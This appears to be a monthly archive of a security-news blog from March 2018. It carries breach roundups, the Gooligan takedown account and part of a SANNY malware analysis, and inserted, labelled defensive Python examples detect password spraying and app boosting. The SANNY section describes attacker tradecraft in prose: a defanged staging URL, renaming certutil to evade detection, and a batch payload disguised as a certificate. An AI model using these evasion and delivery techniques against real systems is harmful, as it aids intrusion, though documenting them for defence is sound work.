Monthly Archives: March 2018
Weekly Cyber Risk Roundup: MyFitnessPal Breach, Carbanak Leader Arrested
Under Armour announced this week that approximately 150 million users of the diet and fitness app MyFitnessPal had their personal information acquired by an unauthorized third party sometime in February 2018. As Reuters noted, it is the largest data breach of 2018 in terms of the number of records affected.
The breach was discovered on March 25, and the data compromised includes usernames, email addresses, and hashed passwords — the majority of which used bcrypt, the company said.
“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users,” the company said in a statement. “Payment card data was not affected because it is collected and processed separately.”
MyFitnessPal also said that it would be requiring users to change their passwords and is urging users to do so immediately. The company is also urging users to review their accounts for suspicious activity as well as to change passwords on any other online accounts that used the same or a similar password to their now-breached MyFitnessPal credentials.
It is unclear how the unauthorized third party acquired the data, and the investigation is ongoing. Under Armour bought MyFitnessPal in February 2015 for $475 million.
Other trending cybercrime events from the week include:
- Employee accounts targeted: The Retirement Advantage is notifying clients that their employees’ personal information may have been compromised due to unauthorized access to an employee email account at its Applied Plan Administrators division. Storemont in Northern Ireland is warning all staff of a cyber-attack targeting email accounts with numerous password attempts, and a number of accounts were compromised due to the attack. Shutterfly is notifying customers that their personal information may have been compromised due to an employee’s credentials being used without authorization to access its Workday test environment.
- Payment card breaches: Manduka is notifying customers of a year-long payment card breach after discovering malware on its e-commerce web platform. Mintie Corporation is notifying customers of a ransomware attack that may have compromised customer payment card information. Fred Usinger said its hosting service provider notified the company of a breach involving personal information and stored payment information.
- Other data breaches: A report from New York’s Attorney General said that 9.2 million New Yorkers had their data exposed in 2017, quadruple the number from 2016. Motherboard obtained thousands of user account details that are circulating on public image boards, and many of those accounts are related to a bestiality website. Mendes & Haney is notifying customers of unauthorized access to its network. Branton, de Jong and Associates is notifying customers that their tax information may have been compromised due to unauthorized access to its tax program. Researchers discovered a misconfigured database belonging to the New York internal medicine and cardiovascular health practice Cohen Bergman Klepper Romano Mds PC that exposed the patient information of 42,000 individuals.
- Other notable events: Baltimore’s 911 dispatch system was temporarily shut down after a hack by an unknown actor led to “limited breach” of the system that supports the city’s 911 and 311 services. Kent NHS Trust is notifying patients that a staff member who had accessed their medical records “without a legitimate business reason” has been dismissed. The Malaysian central bank said it thwarted a cyber-attack that involved falsified wire-transfer requests over the SWIFT bank messaging network. Boeing said that a few machines were infected with the WannaCry malware.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Law enforcement officials in Spain have arrested the alleged leader of the cybercriminal syndicate behind the Carbanak and Cobalt malware attacks, which have targeted more than 100 financial organizations around the world and caused cumulative losses of over €1 billion since 2013.
Europol’s press release did not name the alleged mastermind behind the group; however, Bloomberg reported that Spain’s Interior Ministry named the suspect as Denis K, a Ukrainian national who had accumulated about 15,000 bitcoins (worth approximately $120 million at the time of his arrest). Europol noted that numerous other coders, mule networks, and money launderers connected to the group were also the target of the international law enforcement operation.
The group first used the Anunak malware in 2013 to target financial transfers and ATM networks, and by the following year they had created a more sophisticated version of the malware known as Carbanak, which the group used until 2016. At that point the group carried out an even more sophisticated wave of attacks using custom-made malware based on the Cobalt Strike penetration testing software, Europol said.
“The criminals would send out to bank employees spear phishing emails with a malicious attachment impersonating legitimate companies,” Europol wrote in a press release. “Once downloaded, the malicious software allowed the criminals to remotely control the victims’ infected machines, giving them access to the internal banking network and infecting the servers controlling the ATMs. This provided them with the knowledge they needed to cash out the money.”
Carlos Yuste, a Spanish police chief inspector who helped lead the operation, told Bloomberg that “the head has been cut off” of the high-profile group. Steven Wilson, Head of Europol’s European Cybercrime Centre, said that the arrest illustrates how law enforcement “is having a major impact on top level cybercriminality.”
High Quality Problems – Paul’s Security Weekly #553
This week, Executive Director of Source Boston 2018 Rob Cheyne joins us for an interview! Paul delivers the Technical Segment this week entitled, Cutting The Cord: The Ideal Home Network Setup! In the Security News, we have updates from Apple macOS, Windows 7 Meltdown patch, Atlanta’s Ransomware attack, a special appearance in the Security News from Apollo Clark, and more on this episode of Paul’s Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode553
Visit https://www.securityweekly.com/psw for all the latest episodes!
AV18-053: PHP Security Updates
High Level Lessons – Enterprise Security Weekly #85
This week, Paul is joined by our very own Keith Hoodlet to review the book The Phoenix Project! In the news, we have updates from Cisco, Distil Networks, BeyondTrust, Cambridge Analytica, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode85
Visit https://www.securityweekly.com/esw for all the latest episodes!
AL18-003: Drupal Security Vulnerability
Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication
Nearly A Week After Atlanta’s Cyberattack, Things Are Nowhere Near Normal
AV18-051: OpenSSL Security Updates
AV18-052: Cisco Security Updates
We Like Straight Talk – Business Security Weekly #79
Dan Wheatley, Partner and CEO at Straight Talk Agency, joins us for the interview this week. Tenable hires Morgan Stanley, Sift Science raised $53M Series D, and Virsec raised $24M Series B. This segment is about the companies making news with founding rounds, exits, and other impacts you need to know about in the industry.
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode79
Visit http://securityweekly.com/category/bsw for all the latest episodes!
6 Tips to Overcome Your Online Privacy Concerns
CIPL and AvePoint Release Second Global GDPR Readiness Report
On March 26, 2018, the Centre for Information Policy Leadership at Hunton & Williams LLP and AvePoint released its second Global GDPR Readiness Report (the “Report”), detailing the results of a joint global survey launched in July 2017 concerning organizational preparedness for implementing the EU General Data Protection Regulation (“GDPR”). The Report tracks the GDPR implementation efforts of over 235 multinational organizations, and builds on the findings of the first Global GDPR Readiness Report by providing insights on key changes in readiness levels from 2016 to 2017.
Key highlights of the report include:
- Over half of all respondents have committed additional budget to GDPR implementation, with increases ranging from hundreds of thousands of dollars to upwards of $50 million.
- While technology tools and software are the number one priority for GDPR-focused budget spending, continued reliance on manual methods for building and maintaining data processing inventories, as well as low usage rates of automated software to identify and tag data, indicate that much work is still to be done to assess and procure these solutions.
- Almost a quarter of organizations have not yet implemented any processes to update their controller-processor contracts or review or renegotiate existing agreements. Organizations will have to closely look at their contracts ahead of May 25, 2018, to ensure they include the new required terms introduced by the GDPR.
- Despite little information being available on new GDPR transfer mechanisms such as adequate safeguards or certifications, for the second year in a row, respondents indicated that they are likely to use these mechanisms, with almost one-fifth of organizations reporting they will rely on the latter post-GDPR.
- With regard to security, the majority of organizations have put internal reporting procedures and incident response plans in place. However, organizations still have some work to do in implementing other data breach response procedures, such as conducting dry runs and retaining PR and media consultants.
- Legitimate interest remains the area most in need of clarity under the GDPR, followed by data protection impact assessments and risk, breach notification, notice and consent, and privacy by design.
To read more about these highlights and other insights of the study, please view the full report.
AV18-050: Mozilla Security Updates
DOJ Accuses Iranian Nationals of “Brazen Cyber Assault” on Universities and Government Agencies
The U.S. Department of Justice (the “DOJ”) has unsealed an indictment accusing nine Iranian nationals of engaging in a “massive and brazen cyber assault” against at least 176 universities, 47 private companies and 7 government agencies and non-governmental organizations, including the Federal Energy Regulatory Commission (“FERC”). According to the DOJ, the nationals worked for Mabna Institute, an Iranian-based company, as “hackers for hire,” stealing login credentials and other sensitive information to sell within Iran and for the benefit of the Iranian government.
The indictment notes that the nationals engaged in a number of tactics to gain unauthorized access to systems including: (1) targeting customized spear phishing emails based on publicly available information about the email recipients; (2) obtaining stolen credentials to access accounts; and (3) “password spraying,” whereby the nationals would collect lists of names and email addresses through Internet searches and attempt to gain access to accounts through commonly used passwords.
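The password-spraying tactic described in the indictment has a signature that differs from classic brute force: one source touching many distinct accounts with only one or two failures each, rather than many failures against a single account. The following is an added example, not part of the indictment or the original post, showing how that pattern can be picked out of authentication logs. The log format, the constructed sample lines and the thresholds (`min_users`, `max_fails_per_user`, the 15-minute window) are assumptions for this example.

```python
"""Flag password-spraying patterns in authentication logs.

Password spraying tries a few common passwords against many accounts, so
the tell-tale signal is one source failing against many distinct usernames
with only one or two failures each, rather than many failures on one
account (classic brute force).  Log format and thresholds are assumptions
for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed "key=value" auth-log format.
SAMPLE_LOG = """\
2018-03-20T10:00:01 src=203.0.113.5 user=alice result=FAIL
2018-03-20T10:00:02 src=203.0.113.5 user=bob result=FAIL
2018-03-20T10:00:03 src=203.0.113.5 user=carol result=FAIL
2018-03-20T10:00:04 src=203.0.113.5 user=dave result=FAIL
2018-03-20T10:00:05 src=203.0.113.5 user=erin result=SUCCESS
2018-03-20T10:00:06 src=198.51.100.7 user=alice result=FAIL
2018-03-20T10:00:07 src=198.51.100.7 user=alice result=FAIL
2018-03-20T10:00:08 src=198.51.100.7 user=alice result=FAIL
2018-03-20T10:00:09 src=198.51.100.7 user=alice result=FAIL
2018-03-20T10:00:10 src=198.51.100.7 user=alice result=FAIL
2018-03-20T10:30:00 src=192.0.2.9 user=frank result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_log(text):
    """Parse log lines into dicts; lines that don't match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def find_spray_sources(events, window=timedelta(minutes=15),
                       min_users=4, max_fails_per_user=2):
    """Return {src: sorted(users)} for sources showing a spray pattern.

    A source is flagged when, inside any `window`, it fails against at least
    `min_users` distinct accounts while never exceeding `max_fails_per_user`
    failures on any one of them.  Brute force against a single account
    (many failures, one user) is deliberately not flagged here.
    """
    by_src = defaultdict(list)
    for ev in events:
        if ev["result"] == "FAIL":
            by_src[ev["src"]].append(ev)
    flagged = {}
    for src, fails in by_src.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0  # sliding window over this source's failures
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            per_user = defaultdict(int)
            for ev in fails[start:end + 1]:
                per_user[ev["user"]] += 1
            if (len(per_user) >= min_users
                    and max(per_user.values()) <= max_fails_per_user):
                flagged[src] = sorted(per_user)
                break
    return flagged


def successes_after_spray(events, flagged):
    """Successful logins from a flagged source: accounts to reset first."""
    return sorted({(ev["src"], ev["user"]) for ev in events
                   if ev["result"] == "SUCCESS" and ev["src"] in flagged})


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    hits = find_spray_sources(evs)
    print("spray sources:", hits)
    print("accounts to reset:", successes_after_spray(evs, hits))
```

In the sample, 203.0.113.5 fails once each against four accounts and then succeeds against a fifth, which is the spray shape; 198.51.100.7 fails five times against one account and is left for a separate brute-force rule. The success from a flagged source is the account to reset and review first.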
While the indictment states that the attacks by the nationals cost U.S.-based universities over $3.4 billion in academic and intellectual property theft, the DOJ did not indicate whether sensitive information was stolen from FERC. Notably, FERC collects information from across the energy sector regarding critical infrastructure, called “Critical Electric/Energy Infrastructure” (“CEII”). In late 2015, Congress required FERC to publish regulations enhancing protection for CEII from disclosure, though it did not specifically direct FERC to increase security for CEII. FERC published these regulations in December 2016.
Trump Ally Sues Qatar For Hacking His Email
Learn Network Attacks and Prevention Through Android
CERTs, CSIRTs and SOCs after 10 years from definitions
Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout
One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.
“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.
Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.
As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including Amextravel.com and travel booked through Amex Travel Representatives.
Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current Orbitz.com site was not affected.
Other trending cybercrime events from the week include:
- State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
- Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
- Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
- Other notable events: Frost Bank said that malicious actors compromised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Facebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting firm Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.
“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”
It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.
The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.
Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.
Taking down Gooligan part 3 — monetization and clean-up
This post provides an in-depth analysis of Gooligan monetization schemas and recounts how Google took it down with the help of external partners.
This post is the final post of the series dedicated to the hunt and take down of Gooligan that we did at Google in collaboration with Check Point in November 2016. The first post recounts the Gooligan origin story and offers an overview of how it works. The second one provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. As this post builds on the previous two, I encourage you to read them if you haven’t done so already.
This series of posts is modeled after the talk I gave on the subject at Botconf in December 2017. Here is a recording of the talk:
You can also get the slides here, but they are pretty bare.
Monetization
Gooligan’s goal was to monetize the infected devices through two main fraudulent schemas: Ad fraud and Android app boosting.
Ad fraud
As shown in the screenshot above, periodically Gooligan will use its root privileges to overlay an ad popup for a legitimate app on top of any activity the user was currently doing. Under the hood, Gooligan knows when the user is looking at the phone, as it monitors various key events, including when the screen is turned on.
We don’t have much insight on how effective those ad campaigns were or who was reselling them, as they don’t abuse Google’s ads network, and they use a gazillion HTTP redirects, which makes attribution close to impossible. However we believe that ad fraud was the main driver of Gooligan revenue, given its volume and the fact that we blocked its fake installs as discussed below.
App Boosting
The second way Gooligan attempted to monetize infected devices was by performing Android app boosting. An app boosting package is a bundle of searches for a specific query on the Play store, followed by an install and a review. The search is used in an attempt to rank the app for a given term. This tactic is commonly peddled in App Store Optimization (ASO) guides.
The reason Gooligan went through the trouble of stealing OAuth tokens and manipulating the Play store is probably that the defenses we put in place are very effective at detecting and discounting fake synthetic installs. Using real devices with real accounts was the Gooligan authors’ attempt to evade our detection systems. Overall, it was a total failure on their side: We caught all the fake installs, and suspended the abusive apps and developers.
As illustrated in the diagram above, the app boosting was done in four steps:
Token stealing: The malware extracts the phone’s long term token from the phone’s accounts.
Taking order: Gooligan reports phone information to the central command and control system, and receives in response a reply telling it which app to boost, including which search term to use and which comment to leave (if any). Phone information is exfiltrated because Gooligan authors also had access to non-compromised phones and were trying to use information obtained from Gooligan to fake requests from those phones.
Token exchange: The long term token is exchanged for a short term token that allows Gooligan to access the Play store. We are positive that no user data was compromised by Gooligan, as no other data was ever requested by Gooligan.
Boosting: The fake search, installation, and potential review is carried out through the manipulated Play store app.
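The boosting packages described above (a search for a chosen term, an install, then a review, repeated from many devices) leave a recognisable trace on the store side, which is what makes synthetic installs detectable even when they come from real devices and real accounts. The following is an added example, not Google's detection logic or code from the original post: it scans a constructed stream of store events, finds devices that complete search → install → review within a short gap, and flags apps for which such sequences make up most of the installs. The event format, the thresholds (`max_gap`, `min_devices`, `min_fraction`) and the sample data are assumptions.

```python
"""Flag app-boosting bursts from a constructed stream of store events.

An app boosting package (search for a query, install, then review) leaves a
recognisable trace: many devices performing search -> install -> review for
the same app within seconds, often with the same query and review text.
Organic users rarely review seconds after installing.  Event format and
thresholds are assumptions for this example, not Google's detection logic.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: (timestamp, device_id, app, action, detail)
SAMPLE_EVENTS = [
    ("2016-11-20T09:00:00", "dev-001", "com.boosted.app", "search", "best flashlight"),
    ("2016-11-20T09:00:05", "dev-001", "com.boosted.app", "install", ""),
    ("2016-11-20T09:00:20", "dev-001", "com.boosted.app", "review", "Great app!!"),
    ("2016-11-20T09:01:00", "dev-002", "com.boosted.app", "search", "best flashlight"),
    ("2016-11-20T09:01:04", "dev-002", "com.boosted.app", "install", ""),
    ("2016-11-20T09:01:15", "dev-002", "com.boosted.app", "review", "Great app!!"),
    ("2016-11-20T09:02:00", "dev-003", "com.boosted.app", "search", "best flashlight"),
    ("2016-11-20T09:02:03", "dev-003", "com.boosted.app", "install", ""),
    ("2016-11-20T09:02:30", "dev-003", "com.boosted.app", "review", "Great app!!"),
    # Organic-looking activity for a different app: slow install, review days later.
    ("2016-11-20T09:00:00", "dev-010", "com.honest.app", "search", "notes"),
    ("2016-11-20T09:03:00", "dev-010", "com.honest.app", "install", ""),
    ("2016-11-22T18:00:00", "dev-010", "com.honest.app", "review", "Useful"),
    ("2016-11-20T11:00:00", "dev-011", "com.honest.app", "install", ""),
]


def _parse(events):
    return [(datetime.fromisoformat(ts), dev, app, act, detail)
            for ts, dev, app, act, detail in events]


def synthetic_installs(events, max_gap=timedelta(seconds=60)):
    """Return {app: {device: (query, review_text)}} for every device that
    completed search -> install -> review within `max_gap` of the search."""
    per_pair = defaultdict(list)
    for ts, dev, app, act, detail in _parse(events):
        per_pair[(dev, app)].append((ts, act, detail))
    found = defaultdict(dict)
    for (dev, app), acts in per_pair.items():
        acts.sort()
        for i, (t_search, act, query) in enumerate(acts):
            if act != "search":
                continue
            later = [a for a in acts[i + 1:] if a[0] - t_search <= max_gap]
            installs = [a for a in later if a[1] == "install"]
            reviews = [a for a in later if a[1] == "review"]
            if installs and reviews and installs[0][0] <= reviews[0][0]:
                found[app][dev] = (query, reviews[0][2])
                break
    return found


def flag_boosted_apps(events, min_devices=3, min_fraction=0.5):
    """Return {app: report} for apps whose installs look boosted: at least
    `min_devices` synthetic sequences making up `min_fraction` of installs."""
    total_installs = defaultdict(set)
    for _, dev, app, act, _ in _parse(events):
        if act == "install":
            total_installs[app].add(dev)
    report = {}
    for app, devices in synthetic_installs(events).items():
        n, total = len(devices), len(total_installs[app])
        if n >= min_devices and n / total >= min_fraction:
            report[app] = {
                "synthetic": n,
                "installs": total,
                # Identical queries and review texts across devices are a
                # second signal worth surfacing alongside the timing.
                "queries": sorted({q for q, _ in devices.values()}),
                "review_texts": sorted({r for _, r in devices.values()}),
            }
    return report


if __name__ == "__main__":
    for app, rep in flag_boosted_apps(SAMPLE_EVENTS).items():
        print(app, rep)
```

With the constructed data, all three installs of `com.boosted.app` follow the search → install → review shape with the same query and review text, so it is flagged; `com.honest.app` has a slow install and a review two days later, so it is not. In a real pipeline the flagged apps and the accounts behind the devices would feed the suspension and install-discounting steps the post mentions.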
Clean-up
Cleaning up Gooligan was challenging for two reasons: First, as discussed in the infection post, its reset persistence mechanism meant that a factory reset was not enough to clean up the old unpatched devices. Second, the OAuth tokens had been exfiltrated to Gooligan servers.
Asking users to reflash their devices would have been unreasonable, and issuing an OTA (Over The Air) update would have taken too long. Given this difficult context and the need to act quickly to protect our users, we went for an alternative solution that we rarely use: orchestrating a takedown with the help of third parties.
Takedown
With the help of the Shadowserver Foundation and domain registrars, we sinkholed Gooligan domains and pointed them to Shadowserver-controlled IPs instead of IPs controlled by Gooligan's authors. This sinkholing ensured that infected devices could neither exfiltrate tokens nor receive fraud commands, as they would connect to the sinkhole servers instead of the real command and control servers. As shown in the graph above, our takedown was very successful: It blocked over 50M attempts to connect to Gooligan's control server in 2017.
Notifications
With the sinkhole in place, the second part of the remediation involved resecuring the accounts that were compromised, by disabling the exfiltrated tokens and notifying the users. Notification at that scale is very complex, for three key reasons:
Reaching users in a timely fashion across a wide range of devices is difficult. We ended up using a combination of SMS, email, and Android messaging, depending on what communication channel was available.
It was important to make the notification understandable and useful to all users. Explaining what was happening clearly and simply took a lot of iteration. We ended up with the notification shown in the screenshot above.
Once crafted, the text of the notification and help page had to be translated into the languages spoken by our users. Performing high quality internationalization for over 20 languages very quickly was quite a feat.
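A sinkhole does two jobs at once: it measures the takedown (every blocked connection attempt is logged) and it enumerates the devices whose accounts still need resecuring and notifying. The following is an added example, not code or data from Google, Shadowserver or the original post, tying the takedown and notification passages together: it parses constructed sinkhole log lines, produces the blocked-attempt and distinct-device counts, and builds a per-device remediation record (revoke the exfiltrated token if still valid; notify over SMS, then email, then in-app Android messaging as the fallback). The log format, the `device` field and the account records are assumptions.

```python
"""Turn sinkhole logs into takedown metrics and a remediation queue.

Once a botnet's domains are sinkholed, every connection the infected devices
make lands on the sinkhole instead of the real C2.  That yields a measure of
the takedown (attempts blocked, distinct devices per day) and a list of the
devices whose accounts must be resecured.  Log format, the device identifier
field and the account records are assumptions for this example, not
Google's or Shadowserver's data.
"""
import re
from collections import Counter

# Constructed sinkhole log lines in an assumed format.
SINKHOLE_LOG = """\
2016-11-30T01:00:00Z src=203.0.113.10 device=d-1001 host=c2-example.invalid
2016-11-30T01:00:05Z src=203.0.113.10 device=d-1001 host=c2-example.invalid
2016-11-30T02:15:00Z src=198.51.100.4 device=d-1002 host=c2-example.invalid
2016-12-01T03:00:00Z src=192.0.2.77 device=d-1003 host=c2-example.invalid
2016-12-01T03:00:30Z src=192.0.2.77 device=d-1003 host=c2-example.invalid
garbage line that should be ignored
"""

# Constructed account records keyed by device id: whether the exfiltrated
# token is still valid and which contact channels are on file.
ACCOUNTS = {
    "d-1001": {"account": "user-a", "token_valid": True,
               "phone": "+15550001", "email": "a@example.invalid"},
    "d-1002": {"account": "user-b", "token_valid": True,
               "phone": None, "email": "b@example.invalid"},
    "d-1003": {"account": "user-c", "token_valid": False,
               "phone": None, "email": None},
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) device=(?P<dev>\S+) host=(?P<host>\S+)$"
)


def parse_sinkhole_log(text):
    """Parse well-formed lines; anything else is ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def takedown_metrics(events):
    """Blocked attempts and distinct devices, plus attempts per UTC day."""
    return {
        "blocked_attempts": len(events),
        "distinct_devices": len({ev["dev"] for ev in events}),
        "per_day": dict(Counter(ev["ts"][:10] for ev in events)),
    }


def remediation_plan(events, accounts):
    """One action record per infected device.

    The token is revoked only if it is still valid, and the notification
    channel is the first one available: SMS, then email, then in-app
    Android messaging, which needs no contact data on file.
    """
    plan = []
    for dev in sorted({ev["dev"] for ev in events}):
        rec = accounts.get(dev)
        if rec is None:
            plan.append({"device": dev, "action": "unknown-device"})
            continue
        if rec["phone"]:
            channel = "sms"
        elif rec["email"]:
            channel = "email"
        else:
            channel = "android-message"
        plan.append({"device": dev, "account": rec["account"],
                     "revoke_token": rec["token_valid"], "notify_via": channel})
    return plan


if __name__ == "__main__":
    evs = parse_sinkhole_log(SINKHOLE_LOG)
    print(takedown_metrics(evs))
    for item in remediation_plan(evs, ACCOUNTS):
        print(item)
```

Devices that appear in the sinkhole log but not in the account store are reported as `unknown-device` rather than silently dropped, since those are the cases that need manual follow-up.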
Epilogue
Overall, in order to respond to Gooligan, many people, including myself, ended up working long hours through the Thanksgiving weekend (an important holiday in the U.S.). Our commitment to quickly eradicate this threat paid off: On the evening of Monday, November 29th, the takedown took place, followed the next day by the resecuring of the compromised accounts. All in all, this takedown took a mere few days, which is blazing fast when you compare it to other similar ones. For example, the Avalanche botnet takedown took four years of intensive efforts.
To conclude, Gooligan was a very challenging malware to tackle, due to its scale and unconventional tactics. We were able to meet this challenge and defeat it, thanks to a cross-industry effort and the involvement of many teams at Google that didn’t go home until users were safe.
Thanks for reading this post all the way to the end. I hope it showcases how we approach botnet fighting and sheds some light on some of the lesser known, yet still critical, activities that our research team assists with.
How to download your Facebook data
With all the news about Facebook recently, you might be wondering, what exactly does Facebook know about me from my profile? Sure, you can peruse your profile online, but that doesn’t tell the whole story. One way to see what Facebook has on you is to download your Facebook data.
The ability to download your Facebook data isn’t really new, but not many users know that you can do it. It only takes a few minutes; how long depends on how big your data files are. Here are the steps to download your Facebook data.
If you’ve decided that you want to leave Facebook completely, here’s how to delete, disable, or limit your Facebook account.
Financial Stability Board to Develop International Cybersecurity Lexicon
On March 20, 2018, the Financial Stability Board (“FSB”) delivered a note to finance ministers and central bank governors from the world’s top 20 economic powers, known as the G-20. The note provides a progress update on the FSB’s work to develop a common vocabulary of cyber terms.
The FSB is developing the cyber lexicon to address cybersecurity and cyber resilience in the financial sector and hopes that it will boost cross-border cooperation on cybersecurity. The note warned that “malicious use of Information and Communication Technologies…could disrupt financial services crucial to both national and international financial systems, undermine security and confidence and endanger financial stability.”
According to the note, “[t]he FSB has formed a working group, chaired by the U.S. Federal Reserve Board and comprised of approximately 15 members representing a range of financial sectors (banks, financial market infrastructures, securities and insurance) and jurisdictions, to develop the lexicon.”
For more information, including the next steps and indicative time line, read the full note.
You Stole My Sweater – Paul’s Security Weekly #552
Paul gives a tech segment on How to find the most innovative tech at a security show. In the news, we have updates from Alex Stamos, Facebook harvesting information about YOU, Uber self-driving car hits and kills pedestrian, and more on this episode of Paul's Security Weekly!
→Full Show Notes: https://wiki.securityweekly.com/Episode552
→Visit https://www.securityweekly.com/psw for all the latest episodes!
SANNY Malware Delivery Method Updated in Recently Observed Attacks
Introduction
In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.
As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.
Document Details
The following two documents, detailed below, have been observed in the latest round of attacks:
MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc
The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.
Figure 1: Sample document written in Russian
MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc
The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).
Figure 2: Sample document written in English
Macro Analysis
In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.
Stage 1: BAT File Download
In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.
There were a few interesting observations in the command line:
- The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
- The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3. The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.
Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate
